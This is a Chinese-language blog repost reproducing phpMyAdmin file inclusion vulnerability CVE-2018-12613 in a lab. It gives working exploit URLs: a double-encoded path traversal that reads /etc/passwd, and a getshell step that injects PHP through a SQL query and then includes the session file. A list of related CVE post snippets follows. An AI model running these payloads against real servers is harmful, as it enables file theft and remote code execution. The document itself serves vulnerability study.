2. 程式人生 > >phpmyadmin 遠端檔案包含漏洞(CVE-2018-12613)

phpmyadmin 遠端檔案包含漏洞(CVE-2018-12613)

阿新 發佈:2018-12-21

phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。

漏洞記錄

漏洞編號:CVE-2018-12613

受影響版本:phpMyAdmin 4.8.0和4.8.1受到影響。

利用條件:
攻擊者必須經過身份驗證,但在這些情況下除外:
(/libraries/config.default.php)

  • $ cfg [‘AllowArbitraryServer’] = true:攻擊者可以指定他/她已經控制的任何主機,並在phpMyAdmin上執行任意程式碼
  • $ cfg [‘ServerDefault’] = 0:這會繞過登入並在沒有任何身份驗證的情況下執行易受攻擊的程式碼
  • 漏洞分析
    https://blog.csdn.net/qq_33020901/article/details/80829269

漏洞利用

訪問下面的payload

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可見/etc/passwd被讀取,說明檔案包含漏洞存在:
在這裡插入圖片描述
目前有幾種getshell的方法,有的是上傳sql檔案,然後包含mysql的sql檔案,有的是開啟general_log來完成getshell,現在使用今天這種操作。利用方式也比較簡單,可以執行一下SELECT ‘<?=phpinfo()?>’;,然後檢視自己的sessionid(cookiephpMyAdmin的值),然後包含session檔案即可:
在這裡插入圖片描述

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_0452064cb94eaca79f085df69ffbb2c2

在這裡插入圖片描述

參考連結:在這裡插入圖片描述
https://blog.csdn.net/qq_33020901/article/details/80829269

相關推薦

phpmyadmin 遠端檔案包含漏洞CVE-2018-12613

phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 漏洞記錄 漏洞編號:CVE-2018-12613 受影響版本:phpMyAdmin 4.8.0和

18.phpmyadmin 4.8.1 遠端檔案包含漏洞CVE-2018-12613

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613) phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯, 通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 受影響版本: phpMyAdmin 4.8.0和4

Drupal 遠端命令執行漏洞CVE-2018-7600

名稱: Drupal 遠端命令執行漏洞 CVE-ID: CVE-2018-7600 Poc: https://paper.seebug.org/578/ EXPLOIT-DB: https://www.exploit-db.com/exploits/44448/ 平臺: PHP 漏洞描述:

WebLogic 任意文件上傳 遠程代碼執行漏洞 CVE-2018-2894------->>>任意文件上傳檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

Vulhub - Ruby On Rails 路徑穿越漏洞CVE-2018-3760復現

Ruby On Rails 路徑穿越漏洞(CVE-2018-3760) Ruby On Rails在開發環境下使用Sprockets作為靜態檔案伺服器,Ruby On Rails是著名Ruby Web開發框架,Sprockets是編譯及分發靜態資原始檔的Ruby庫。 Sprockets

緩衝區溢位漏洞CVE-2018-4407可導致核心崩潰,蘋果多款作業系統均受影響

該漏洞使得攻擊者只要接入同一Wi-Fi網路,即可向其他毫不知情的使用者傳送惡意資料包來觸發任何Mac或iOS裝置的崩潰和重啟。由於該漏洞存在於系統網路核心程式碼,因此任何反病毒軟體均無法防禦。 執行以下作業系統的裝置易受攻擊: Apple iOS 11及更早版本:所有裝置(升級

GoAhead Web伺服器遠端命令執行漏洞CVE-2017-17562漏洞復現

一、漏洞概述: 1、漏洞簡介: GoAhead Web Server,它是一個開源(商業許可)、簡單、輕巧、功能強大、可以在多個平臺執行的嵌入式Web Server。 GoAhead Web Server是跨平臺的伺服器軟體,可以穩定地執行在Windows,Linux和

Ruby On Rails 路徑穿越漏洞CVE-2018-3760復現

Ruby On Rails 路徑穿越漏洞(CVE-2018-3760) Ruby On Rails在開發環境下使用Sprockets作為靜態檔案伺服器,Ruby On Rails是著名Ruby Web開發框架,Sprockets是編譯及分發靜態資原始檔的Ruby庫。 Sp

PDF漏洞CVE-2018-12794淺析

資源 就是 ids rip flags 威脅 follow ras 獲取 漏洞簡介 CVE-2018-12794屬於類型混淆漏洞,產生漏洞原因是通過構建XML數據包(XML Data Package,XDP)模版,並對XML表單體系結構(XML Forms Archite

Apache ActiveMQ任意檔案寫入漏洞CVE-2016-3088復現

### Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)復現 #### 一、漏洞簡介 ​ 2016年4月14日,國外安全研究人員 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多個安全漏洞,可使遠端攻擊者用惡意程式碼替代We

Elasticsearch 核心外掛Kibana 本地檔案包含漏洞分析CVE-2018-17246

不久前Elasticsearch釋出了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console外掛存在嚴重的本地檔案包含漏洞可導致拒絕服務攻擊、任意檔案讀取攻擊、配合第三方應用反彈SHELL攻擊,下文筆者對其漏洞背景、攻擊原理和行為進行分析和復現。

weblogic系列漏洞整理————8、WebLogic 兩處任意檔案上傳漏洞動態分析CVE-2018-2894

0x01 前言 CNCERT前幾天發公告稱發現Oracle公司出品的基於JavaEE結構的中介軟體WebLogic產品存在一個遠端上傳漏洞,並得到了廠商的確認,危害程度評分高達9.8分。鑑於廠商已進行了安全修復,筆者對該漏洞進行了一次分析。WebLogic管理端未授權的

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553) 一、漏洞描述 該漏洞在/install/index.php(index.php.bak)檔案中,漏洞起因是$$符號使用不當,導致變數覆蓋,以至於最後引起遠端檔案包含漏洞。 二、漏洞影響版本 DeDeCMS < 5.7-

360眾測考試,weblogic題CVE-2018-2894檔案上傳漏洞

0x01 漏洞簡介 Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案上傳漏洞,Web Service Test Page 在 ‘生產模式’

Nginx 漏洞 CVE-2018-16843,CVE-2018-16844

近日 nginx 被爆出存在安全問題,有可能會致使 1400 多萬臺伺服器易遭受 DoS ***。而導致安全問題的漏洞存在於 HTTP/2 和 MP4 模組中。 nginx Web 伺服器於 11 月 6 日 釋出了新版本 ,用於修復影響 1.15.6, 1.14.1 之前版本的多個安全問題,被發現的安全問

PHP任意檔案上傳漏洞CVE-2015-2348

安全研究人員今天釋出了一箇中危漏洞——PHP任意檔案上傳漏洞(CVE-2015-2348)。 在上傳檔案的時候只判斷檔名是合法的檔名就斷定這個檔案不是惡意檔案,這確實會導致其他安全問題。並且在這種情況下,在你自己的檔案中檢查漏洞很不現實,因為這個漏洞可以繞過你對檔名字尾、檔案型別(Content-Typ

OpenSSH使用者列舉漏洞pocCVE-2018-15473

漏洞簡介:通過向OpenSSH伺服器傳送一個錯誤格式的公鑰認證請求,可以判斷是否存在特定的使用者名稱。如果使用者名稱不存在,那麼伺服器會發給客戶端一個驗證失敗的訊息。如果使用者名稱存在,那麼將因為解析失敗,不返回任何資訊,直接中斷通訊。     重要部分,poc下

HTTP.SYS遠端程式碼執行漏洞CVE-2015-1635,MS15-034

漏洞描述及滲透過程 HTTP協議堆疊(HTTP.sys)中存在一個遠端執行程式碼漏洞,該漏洞是在HTTP.sys不正確地分析特製HTTP請求時引起的。   漏洞危害 攻擊者只需要傳送惡意的http請求資料包,就可能遠端讀取IIS伺服器的記憶體資料,或使伺服器系統藍屏崩潰

php檔案包含漏洞利用phpinfo復現

 利用docker復現該漏洞,訪問http://192.168.80.156:8080/phpinfo.php,可以看到頁面出現phpinfo頁面 再訪問http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到該頁面是存在檔案包含漏洞的。

Linux中create_elf_tables函式整型溢位漏洞分析CVE-2018-14634

在這篇文章中,我們將跟大家分析Linux平臺中create_elf_tables函式的一個整型溢位漏洞(CVE-2018-14634)。 概述 在近期的一次安全分析過程中,我們在64位Linux系統核心裡的create_elf_tables()函式中發現了一個整型溢位漏洞,本地攻擊者將